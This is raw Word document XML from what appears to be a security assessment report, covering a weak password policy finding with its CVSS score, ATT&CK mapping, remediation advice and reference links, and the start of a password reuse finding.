        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R63de1fc3737146d0">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="0EF283EB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>NVISO Labs: Breaking out of Windows Kiosks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="70751889" w14:textId="4EEA1FE8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="05341CC4" w14:textId="45C7C9DD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc2002989248" w:id="477003753"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79253380">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="452D1426">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79253380">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1: Weak Password Policies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47700375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14F8EBE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46A601B" w14:textId="19E2A23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401E62" w14:textId="4B74FDA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C13D9BE" w14:textId="37D49D14">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4FF37C2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8831F40" w14:textId="66D9EE9D">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270FBF6" w14:textId="53889770">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C9232B2" w14:textId="70310429">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers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2C7DEF7" w14:textId="05344C00">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77C7EA64">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5FFC7E" w14:textId="21F135F2">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09931DA" w14:textId="42526138">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4532CF3"/>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0AE687C"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="130C746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A956E6" w14:textId="09E4EB0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13EC380" w14:textId="47943865">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="Rdae2b535a51e4189">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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VI:</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VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:N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793E1D9C">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386F7D" w14:textId="189EA2A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290AC7" w14:textId="7220FC42">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B642550" w14:textId="7F07A17F">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R9a5441bedc444005">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:u w:val="single"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1110.003: Password Spraying</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="07E787A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B91DFA4"/>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0C6104" w14:textId="5ACC44B7">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w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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B5BF96E" w:rsidP="0D325B6E" w:rsidRDefault="7B5BF96E" w14:paraId="489D7532" w14:textId="67364329">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821ca5af898d4645">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7B5BF96E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7FE7D1CB" w14:textId="25926375">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9a9a1966bdda499d">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1032: Multi-Factor Authentication</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6C589AF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DF12631" w14:textId="4BD4345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87A60CC" w14:textId="0FCE3CC2">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13A482EE" w14:textId="02252550">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="39ED50E7" w14:textId="01ADF57D">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9253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="6526DE6E" w14:textId="16423138">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79253380">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The </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="79253380">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>affected host</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BF19D69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’s password policy was found to have weak requirements that allow for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A185906">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>passwords that are easily cracked using brute force attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BF19D69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1E4A5461" w14:textId="6B992DA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9253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="06DB5801" w14:textId="0416643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9253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="0F4AB5EE" w14:textId="50692AA8">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and data leakage as an attacker that </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="49181C93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>discovers</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0CB42A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a user’s credentials </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can impersonate them and </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 resources under their control.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4DE0969F" w14:textId="13D7F20A">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9253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="7016F1D2" w14:textId="20153BA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79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="1566F14F" w14:textId="27C4722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Step 1: Run a </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brute</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BF8B76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force</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 attack </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="245C6D48">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systematically guessing passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2E9916AE" w14:textId="5ED0759B">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9253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="4FC5F664" w14:textId="68D8DE7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79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="59A0F42A" w14:textId="5E23F81B">
      <w:p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79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="713F6A9A" w14:textId="0570D3FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>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and enforce a strong password policy for all accounts to ensure attackers are unable easily brute force passwords. As a baseline the following </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minimum</w:t>
      </w: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 policy is recommended:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="0D419E88" w14:textId="1D608C33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>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w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="66CF51D3" w14:textId="0F043494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>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w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="65C19800" w14:textId="6A17A732">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>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w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="2FBFE543" w14:textId="32A51F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>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w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="2D5AAF73" w14:textId="53A0967A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0EFE2FBE" w14:textId="5C2271C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>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79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="4F027CA0" w14:textId="70B7F73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25338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9253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="371814EB" w14:textId="3969EE74">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R461890adf7734532">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="79253380">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DigiCert - Creating Password Policy Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="29ED87BF" w14:textId="6C12ED8A">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rff44d8b81a094867">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="79253380">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Linode - Fail2Ban for SSH Brute-force Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="79253380" w:rsidP="0D325B6E" w:rsidRDefault="79253380" w14:paraId="34FA9D1E" w14:textId="10CA3C33">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Re477e2d26a6c4ce7">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="79253380">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks - Multi Factor Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2A2810D0" w14:textId="29E63B14">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="56F8AEF3" w14:textId="4CAA8FF7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="293F8316" w:rsidP="0D325B6E" w:rsidRDefault="293F8316" w14:paraId="4C70EF35" w14:textId="01E31EF9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="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95002224" w:id="2008979295"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="293F8316">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BFDC4E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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="293F831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Password Reuse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200897929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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0625F36E">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79AA05" w14:textId="6A49CA65">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EAD3FA" w14:textId="4527DC0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58F9A44" w14:textId="3C820DCD">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6C6ACDAD">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FEE197" w14:textId="6E9162A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994A4EF" w14:textId="6B510D05">
            <w:pPr>
              <w:spacing w:after="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91FD489" w14:textId="6778C29F">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1C2B04F" w14:textId="273C1C0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174CFBFA">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D4172B" w14:textId="238D41F0">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1C82831" w14:textId="120341BE">
            <w:pPr>
              <w:spacing w:after="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58121926"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D126FBD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="72CFAB13">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7469C4E" w14:textId="697F9F2A">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C33730D" w14:textId="7B81644B">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R0a92a959ee4a4e62">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3E7BCAB8">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387C25" w14:textId="3654A9E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76E934" w14:textId="27F7E51F">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4D98F37" w14:textId="15CBAEDA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rabf208e84c254c1d">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
